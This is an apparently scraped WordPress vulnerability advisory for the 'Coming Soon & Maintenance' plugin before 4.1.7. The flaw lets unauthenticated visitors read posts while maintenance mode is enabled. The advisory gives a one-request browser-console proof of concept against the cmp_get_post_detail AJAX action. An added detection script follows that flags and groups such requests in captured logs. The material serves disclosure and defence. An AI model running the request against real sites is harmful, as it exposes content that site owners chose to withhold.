wpexploit / Wpvulndb / WPEX-ID:2E07FFD9-8E82-4078-96AA-162EF78C417B
Mar 07, 2023 - 12:00 a.m.

Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access in Maintenance Mode

2023-03-07 00:00:00
wpvulndb
unauthenticated access
maintenance mode
developer console
web browser
command
exploit

EPSS: 0.003 (Low)
Percentile: 65.6%

The plugin does not restrict access to published, non-protected posts/pages when maintenance mode is enabled, allowing unauthenticated users to access them.

With maintenance mode enabled, run the following command in the web browser's developer console while visiting the blog as an unauthenticated user:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=cmp_get_post_detail&id=42',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
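
Detection logic for the request shown above, as an added example (not from the advisory or the plugin's code): it scans captured HTTP requests for calls to the cmp_get_post_detail AJAX action that carry no WordPress login cookie and groups them per client. The record shape, function names and threshold are assumptions, and the sample records are constructed.

```javascript
// Added example: flag unauthenticated cmp_get_post_detail calls in captured requests.
// The record shape (ip, method, url, body, cookie) is an assumed WAF/proxy log export.
const AJAX_PATH = "/wp-admin/admin-ajax.php";
const ACTION = "cmp_get_post_detail";

function matchProbe(rec) {
  const url = new URL(rec.url, "http://placeholder.invalid");
  if (!url.pathname.endsWith(AJAX_PATH)) return null;
  // admin-ajax.php accepts "action" in the query string or the body, so check both.
  const body = new URLSearchParams(rec.method === "POST" ? rec.body || "" : "");
  const action = body.get("action") ?? url.searchParams.get("action");
  if (action !== ACTION) return null;
  // A logged-in WordPress session carries a wordpress_logged_in_<hash> cookie.
  if (/(^|;\s*)wordpress_logged_in_[^=]*=/.test(rec.cookie || "")) return null;
  // The id is collected from either location for reporting only.
  const id = body.get("id") ?? url.searchParams.get("id");
  return { ip: rec.ip, id };
}

// Group hits per client; many distinct ids from one client suggests post enumeration.
function summarize(records, enumThreshold = 3) {
  const byIp = new Map();
  for (const rec of records) {
    const hit = matchProbe(rec);
    if (!hit) continue;
    if (!byIp.has(hit.ip)) byIp.set(hit.ip, new Set());
    byIp.get(hit.ip).add(hit.id);
  }
  return [...byIp].map(([ip, ids]) => ({
    ip, distinctIds: ids.size, enumeration: ids.size >= enumThreshold,
  }));
}

// Constructed sample records (documentation IP ranges), not real traffic.
const SAMPLE = [
  { ip: "203.0.113.7", method: "POST", url: AJAX_PATH, body: "action=cmp_get_post_detail&id=42", cookie: "" },
  { ip: "203.0.113.7", method: "POST", url: AJAX_PATH, body: "action=cmp_get_post_detail&id=43", cookie: "" },
  { ip: "203.0.113.7", method: "POST", url: AJAX_PATH, body: "action=cmp_get_post_detail&id=44", cookie: "" },
  { ip: "198.51.100.9", method: "POST", url: AJAX_PATH, body: "action=cmp_get_post_detail&id=42", cookie: "wordpress_logged_in_abc=editor%7C1" },
  { ip: "198.51.100.20", method: "POST", url: AJAX_PATH, body: "action=heartbeat", cookie: "" },
  { ip: "192.0.2.5", method: "GET", url: AJAX_PATH + "?action=cmp_get_post_detail&id=7", cookie: "" },
];

console.log(summarize(SAMPLE));
```

On a site running a version before 4.1.7 with maintenance mode enabled, any hit from this check is worth reviewing against the posts that were published at the time.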
